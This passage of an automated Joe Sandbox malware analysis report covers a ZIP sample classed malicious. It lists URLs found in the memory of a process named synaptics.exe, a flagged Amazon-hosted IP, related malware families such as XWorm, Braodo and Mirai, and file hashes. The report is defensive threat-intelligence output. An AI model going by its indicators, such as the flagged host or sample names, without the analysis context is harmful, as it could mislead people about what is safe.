                                                                                                                https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.synaptics.exe, 0000000E.00000003.1837071396.0000000001AEC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1671882063.0000000001AED000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1755199297.0000000001AEE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1942878468.0000000001AEE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1797188977.0000000001AEC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1881745722.0000000001AEE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1666692376.0000000001AE8000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1750547795.0000000001AE8000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1895983675.0000000001AEE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1930250320.0000000001AE8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://google.com/synaptics.exe, 0000000E.00000003.1665090261.0000000001661000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1657418032.00000000016D0000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1987150935.00000000004A4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://mahler:8092/site-updates.pysynaptics.exe, 0000000E.00000003.1873668796.0000000001683000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1885600236.0000000001CAD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1868762466.0000000001CAD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2025413905.0000000001684000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1893181022.0000000001684000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1974413565.0000000001682000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1820282468.0000000001AFF000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1841323877.0000000001682000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://code.activestate.com/recipes/259174/synaptics.exe, 0000000E.00000003.1568979332.0000000001505000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://github.com/psf/requests/issues/1846synaptics.exe, 0000000E.00000003.1872057233.00000000015E1000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1884206824.0000000001A05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://crl.securetrust.com/SGCA.crlsynaptics.exe, 0000000E.00000003.2003685939.0000000001B13000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000002.2070826986.0000000001B13000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1930250320.0000000001B0E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1985831849.0000000001B13000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2031635787.0000000001B13000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://.../back.jpegsynaptics.exe, 0000000E.00000003.1872057233.00000000015E1000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000002.2091936766.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1882323668.0000000001676000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1884206824.0000000001A05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://www.python.org/download/releases/2.3/mro/.synaptics.exe, 0000000E.00000003.1566011957.000000000047D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://httpbin.org/postsynaptics.exe, 0000000E.00000003.2000623728.0000000000489000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1576834814.000000000048A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2022069345.000000000048A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1557643124.000000000048A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://github.com/Ousret/charset_normalizersynaptics.exe, 0000000E.00000003.1754288177.000000000150C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1759720102.000000000150F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2003475235.0000000001D31000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2011600691.0000000001D31000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1985740272.0000000001D31000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1961070644.0000000001D30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://urllib3.readthedocs.io/en/latest/advanced-usage.htmlsynaptics.exe, 0000000E.00000003.1671882063.0000000001AED000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1666692376.0000000001AE8000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1707543519.0000000001AF6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://github.com/urllib3/urllib3/issues/2920synaptics.exe, 0000000E.00000002.2085454044.0000000003700000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://crl.securetrust.com/SGCA.crl0synaptics.exe, 0000000E.00000003.1986662945.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1975463854.00000000019EC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://hg.python.org/cpython/file/7aaba721ebc0/Lib/socket.py#l252synaptics.exe, 0000000E.00000003.1665090261.0000000001661000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1669337534.000000000166E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            https://yahoo.com/synaptics.exe, 0000000E.00000003.1867809289.0000000001641000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1879641191.0000000001641000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1872057233.0000000001641000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1824970526.000000000163F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1888699521.0000000001641000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1989810343.0000000001637000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1923500924.0000000001641000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1998569141.000000000163F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://foss.heptapod.net/pypy/pypy/-/issues/3129synaptics.exe, 0000000E.00000003.1653243897.0000000001612000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                http://crl.securetrust.com/STCA.crl0synaptics.exe, 0000000E.00000003.1975463854.00000000019EC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6synaptics.exe, 0000000E.00000003.1648976556.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1872057233.000000000161E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1690514638.000000000161D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2026265739.00000000004AA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1647749038.00000000016D0000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2016900266.00000000004A6000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1653243897.0000000001612000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1996242373.00000000004A8000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000002.2041050261.00000000004AA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1679320741.000000000161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://html.spec.whatwg.org/multipage/synaptics.exe, 0000000E.00000003.2005085919.000000000162C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1989810343.000000000162D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1666279981.000000000162B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1824970526.0000000001628000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1966363766.000000000162D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1661362140.000000000162B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1690514638.000000000162A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1675448083.000000000162D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://www.quovadisglobal.com/cps0synaptics.exe, 0000000E.00000003.1989810343.0000000001635000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1923500924.0000000001634000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningssynaptics.exe, 0000000E.00000002.2083900746.0000000001EF0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0synaptics.exe, 0000000E.00000003.1981058371.00000000014E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://www.ietf.org/rfc/rfc4627.txtsynaptics.exe, 0000000E.00000003.1872057233.00000000015E1000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1884206824.0000000001A05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://www.rfc-editor.org/rfc/rfc8259#section-8.1synaptics.exe, 0000000E.00000003.1837071396.0000000001AEC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1671882063.0000000001AED000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1680210138.000000000171A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1740211106.0000000001AED000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1797188977.0000000001AEC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1666692376.0000000001AE8000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1750547795.0000000001AE8000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1930250320.0000000001AE8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://www.pkware.com/documents/casestudies/APPNOTE.TXTsynaptics.exe, 0000000E.00000003.1705608344.00000000015D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  http://www.iana.org/time-zones/repository/tz-link.htmlsynaptics.exe, 0000000E.00000003.1625000683.0000000001672000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1628618892.000000000152F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://requests.readthedocs.iosynaptics.exe, 0000000E.00000003.2026431040.0000000004120000.00000004.00001000.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1557643124.000000000048A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      http://repository.swisssign.com/synaptics.exe, 0000000E.00000002.2069577398.00000000019EA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2031635787.0000000001B1B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1964387506.0000000001B1B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000002.2070826986.0000000001B1B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1930250320.0000000001B19000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1975463854.00000000019EC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2024048436.0000000001B1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://www.demo2s.com/Tutorial/Cpp/0380__set-multiset/Catalog0380__set-multiset.htmsynaptics.exe, 0000000E.00000003.1568979332.0000000001505000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://bugs.python.org/issue29585synaptics.exe, 0000000E.00000003.1537720925.0000000000497000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            http://crl.xrampsecurity.com/XGCA.crlsynaptics.exe, 0000000E.00000003.2003685939.0000000001B13000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000002.2070826986.0000000001B13000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1930250320.0000000001B0E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1985831849.0000000001B13000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2031635787.0000000001B13000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              http://mail.python.org/pipermail/python-bugs-list/2001-January/003752.htmlsynaptics.exe, 0000000E.00000003.1613948269.0000000001655000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://www.python.orgsynaptics.exe, 0000000E.00000003.2000623728.0000000000489000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1576834814.000000000048A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2022069345.000000000048A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1557643124.000000000048A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/synaptics.exe, 0000000E.00000003.2012530001.000000000162C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2005085919.000000000162C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2019422179.000000000162C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1824970526.0000000001628000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    http://java.sun.com/j2se/1.5.0/docs/api/java/util/concurrent/synaptics.exe, 0000000E.00000003.1583695126.0000000001698000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1583868672.0000000001589000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      http://www.accv.es/legislacion_c.htm0Usynaptics.exe, 0000000E.00000003.1981058371.00000000014E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        http://ocsp.accv.es0synaptics.exe, 0000000E.00000003.1981058371.00000000014E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://www.python.org/synaptics.exe, 0000000E.00000003.1873668796.0000000001683000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2025413905.0000000001684000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1893181022.0000000001684000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1974413565.0000000001682000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1820282468.0000000001AFF000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1841323877.0000000001682000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://json.orgsynaptics.exe, 0000000E.00000003.1675448083.000000000162D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1993299353.000000000166E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              http://code.activestate.com/recipes/577573-compare-algorithms-for-heapqsmallestsynaptics.exe, 0000000E.00000003.1665090261.0000000001661000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://www.python.org/dev/peps/pep-0205/synaptics.exe, 0000000E.00000003.1582017768.000000000150C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1582017768.00000000014E0000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1586779864.0000000001504000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1579723171.0000000000499000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1581103865.000000000049A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1581103865.00000000004B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  http://pubs.opengroup.org/onlinepubs/009695399/basedefs/xbd_chap04.html#tag_04_11synaptics.exe, 0000000E.00000003.1683425743.00000000015DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://www.cert.fnmt.es/dpcs/_synaptics.exe, 0000000E.00000003.1936275279.0000000001782000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://twitter.com/synaptics.exe, 0000000E.00000003.1824970526.000000000163F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1989810343.0000000001637000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2003475235.0000000001D31000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2011600691.0000000001D31000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1985740272.0000000001D31000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1998569141.000000000163F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1961070644.0000000001D30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        http://www.quovadisglobal.com/cpssynaptics.exe, 0000000E.00000003.2003475235.0000000001D31000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2011600691.0000000001D31000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1985740272.0000000001D31000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1961070644.0000000001D30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://google.com/synaptics.exe, 0000000E.00000003.1998569141.000000000163F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1961070644.0000000001D30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://github.com/openssl/openssl/issues/14579synaptics.exe, 0000000E.00000003.1653243897.0000000001612000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                                              • 75% < No. of IPs
                                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                              52.0.145.89
                                                                                                                                                                                                              cpanel119.turbify.bizUnited States
                                                                                                                                                                                                              14618AMAZON-AESUStrue
                                                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                              Analysis ID:1578963
                                                                                                                                                                                                              Start date and time:2024-12-20 16:24:45 +01:00
                                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                                              Overall analysis duration:0h 9m 11s
                                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                                              Report type:full
                                                                                                                                                                                                              Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                              Number of analysed new started processes analysed:24
                                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                                                              Technologies:
                                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                                              Sample name:DzbIZ1HRMj.zip
                                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                                              Classification:mal68.winZIP@17/1408@1/1
                                                                                                                                                                                                              EGA Information:
                                                                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                                                                              HCA Information:Failed
                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                              • Found application associated with file extension: .zip
                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 23.195.62.26, 20.12.23.50
                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                              • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                              No simulations
                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                              52.0.145.89tmp.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                cpanel119.turbify.biztmp.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 52.0.145.89
                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                AMAZON-AESUShUhhrsyGtz.exeGet hashmaliciousCryptbotBrowse
                                                                                                                                                                                                                • 34.226.108.155
                                                                                                                                                                                                                pCElIX19tu.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 34.226.108.155
                                                                                                                                                                                                                securedoc_20241220T070409.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 52.86.107.71
                                                                                                                                                                                                                5Jat5RkD3a.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 34.226.108.155
                                                                                                                                                                                                                https://postoffice.adobe.com/po-server/link/redirect?target=eyJhbGciOiJIUzUxMiJ9.eyJ0ZW1wbGF0ZSI6ImNjX2NvbGxhYl9kY3NoYXJpbmdfdmlld19lbWFpbCIsImVtYWlsQWRkcmVzcyI6ImJyaWFuLmh1dGNoaW5zQHJpdmVycm9jay5jb20iLCJyZXF1ZXN0SWQiOiJhYzIxMDNjZS03NDZkLTRmMTctNjBkYi00MzM5OWU3NzU5NGEiLCJsaW5rIjoiaHR0cHM6Ly9hY3JvYmF0LmFkb2JlLmNvbS9pZC91cm46YWFpZDpzYzpWQTZDMjplOTgwMjRmZi03NGRmLTRlNjctYjJkZi0wNWY0NTk4MTc4OWUiLCJsYWJlbCI6IjExIiwibG9jYWxlIjoicHRfQlIifQ.GzFDC4sqpVLEAHwIPLSleF4_d0iUGb4--dg-spPTHWsUGjt086-aN6bs1cEm-BfvTqQu97RqT5NU-RFwvTkvTAGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 3.236.206.93
                                                                                                                                                                                                                arm5.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                • 54.7.169.53
                                                                                                                                                                                                                arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                • 18.214.183.17
                                                                                                                                                                                                                nsharm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                • 15.177.209.179
                                                                                                                                                                                                                tmp.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 52.0.145.89
                                                                                                                                                                                                                https://alphaarchitect.com/2024/12/long-term-expected-returns/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 3.225.89.177
                                                                                                                                                                                                                No context
                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                C:\Users\Public\M20EKMMEH2\DLLs\_asyncio.pydvUlh7stUHJ.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                  vUlh7stUHJ.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                    https://t.ly/-kxCOGet hashmaliciousBraodoBrowse
                                                                                                                                                                                                                      protected.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        x.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          https://t.ly/SjDNXGet hashmaliciousPython Stealer, BraodoBrowse
                                                                                                                                                                                                                            SecuriteInfo.com.Win32.Patched.24562.10289.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              SecuriteInfo.com.Win32.Patched.24562.10289.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                SecuriteInfo.com.Win32.Patched.29806.7109.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):56600
                                                                                                                                                                                                                                  Entropy (8bit):6.701238830377098
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:FDUfUUn5KdYveu2H7sz9YHIRTRILOnY7SyOPx3A:FDgDn0KPz9YHIxRILOnYIx3A
                                                                                                                                                                                                                                  MD5:252C9B6FCC220FE16499ABF4A8E2A2E8
                                                                                                                                                                                                                                  SHA1:03327874A1153E9FE640E6F5E8D987CCC84034C4
                                                                                                                                                                                                                                  SHA-256:E01FDB89380EBF58700F40DCEBAFCB37F24970C8EA1F33063BDEA873B53E720D
                                                                                                                                                                                                                                  SHA-512:F68C9D043D5EF7A32098DDD9C1622F761F88DA31CA47450AB1D95E51AB8CD06E1658DC57DB150AAF51B682F7F285654E6BBD118B3CA8400BB5B2D461BDC78926
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                                                  • Filename: vUlh7stUHJ.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: vUlh7stUHJ.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: , Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: protected.ps1, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: x.bat, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: , Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Win32.Patched.24562.10289.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Win32.Patched.24562.10289.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Win32.Patched.29806.7109.exe, Detection: malicious, Browse
